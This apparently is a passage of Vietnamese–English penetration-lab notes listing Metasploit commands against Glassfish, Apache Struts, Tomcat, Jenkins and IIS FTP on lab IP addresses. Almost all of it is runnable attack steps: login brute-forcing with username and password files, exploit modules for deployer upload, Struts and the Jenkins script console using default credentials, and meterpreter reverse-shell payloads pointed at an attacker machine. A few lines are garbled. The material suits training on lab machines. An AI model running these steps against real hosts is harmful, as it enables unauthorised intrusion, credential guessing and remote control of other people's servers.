You are on page 1of 8

192.168.48.

128

I. Glassfish

1. Module auxiliary/scanner/http/glassfish_login

msf > use auxiliary/scanner/http/glassfish_login

msf auxiliary(glassfish_login) > set rhosts 192.168.1.14

msf auxiliary(glassfish_login) > set rport 4848

msf auxiliary(glassfish_login) > set STOP_ON_SUCCESS true

msf auxiliary(glassfish_login) > set user_file /root/Desktop/user.txt

msf auxiliary(glassfish_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(glassfish_login) >exploit

2. Module auxiliary/scanner/http/glassfish_login

Show targets – set Target Java Universal

Show payloads - msf6 exploit(multi/http/glassfish_deployer) > set19


msf6 exploit(multi/http/glassfish_deployer) > set rhosts 192.168.48.128 (IP máy
bị tấn công)

msf6 exploit(multi/http/glassfish_deployer) > set USERNAME admin

msf6 exploit(multi/http/glassfish_deployer) > set PASSWORD sploit

msf6 exploit(multi/http/glassfish_deployer) > set LPORT 4444

msf6 exploit(multi/http/glassfish_deployer) > set LHOST 192.168.11.130 (ip


máy kali dùng tấn công)

Xâm nhập thành công

Úesết seảmsfmsfmsf
II. Apache Struts

msf6 > search struts

msf6 > use exploit/multi/http/struts_dmi_rest_exec

msf6 exploit(multi/http/struts_dmi_rest_exec) > set payload


payload/java/meterpreter/reverse_tcp

msf6 exploit(multi/http/struts_dmi_rest_exec) > set target Java Universal

msf6 exploit(multi/http/struts_dmi_rest_exec) > set rhosts 192.168.48.128

msf6 exploit(multi/http/struts_dmi_rest_exec) > set rport 8282

msf6 exploit(multi/http/struts_dmi_rest_exec) > exploit

III. Tomcat

1. Module auxiliary/scanner/http/tomcat_enum: Lấy thông tin về usernamr


trong tomcat:

msf6 auxiliary(scanner/http/tomcat_enum) > set targeturi /manager

msf6 auxiliary(scanner/http/tomcat_enum) > set rport 8282

msf6 auxiliary(scanner/http/tomcat_enum) > set rhosts 192.168.48.128

msf6 auxiliary(scanner/http/tomcat_enum) > exploit


2. auxiliary/scanner/http/tomcat_mgr_login: Tấn công login

msf6 auxiliary(scanner/http/tomcat_enum) > use


auxiliary/scanner/http/tomcat_mgr_login

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.48.128

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8282

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set verbose false

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set userpass_file


/home/kali/userpass.txt

msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit

3. Module exploits/multi/http/tomcat_mgr_upload

msf6 exploit(multi/http/tomcat_mgr_deploy) > set target Windows Universal

set payload payload/windows/meterpreter/reverse_tcp

msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.48.128


msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8282

msf6 exploit(multi/http/tomcat_mgr_upload) > set httpusername sploit

httpusername => sploit

msf6 exploit(multi/http/tomcat_mgr_upload) > set httppassword sploit

httppassword => sploit

msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

IV Jenkits

1. Module exploits/multi/http/jenkins_script_console

msf6 exploit(multi/http/jenkins_script_console) > show targets

Exploit targets:

Id Name

-- ----

0 Windows

1 Linux

2 Unix CMD
msf6 exploit(multi/http/jenkins_script_console) > set target Windows

msf6 exploit(multi/http/jenkins_script_console) > set rhosts 192.168.48.128

msf6 exploit(multi/http/jenkins_script_console) > set rport 8484

msf6 exploit(multi/http/jenkins_script_console) > exploit

2. Module auxiliary/scanner/http/jenkins_enum

msf6 auxiliary(scanner/http/jenkins_enum) > set rhosts 192.168.48.128

msf6 auxiliary(scanner/http/jenkins_enum) > set rport 8484

msf6 auxiliary(scanner/http/jenkins_enum) > set targeturi /

msf6 auxiliary(scanner/http/jenkins_enum) > exploit


V. IIS - FTP

msf6 > use auxiliary/scanner/ftp/ftp_login

msf6 auxiliary(scanner/ftp/ftp_login) > set rhost 192.168.48.132

msf6 auxiliary(scanner/ftp/ftp_login) > set rport 21

msf6 auxiliary(scanner/ftp/ftp_login) > set user_file /home/kali/usernames.txt

msf6 auxiliary(scanner/ftp/ftp_login) > set pass_file /home/kali/passwords.txt

msf6 auxiliary(scanner/ftp/ftp_login) > set verbose false

msf6 auxiliary(scanner/ftp/ftp_login) > exploit

VI. IIS - HTTP

You might also like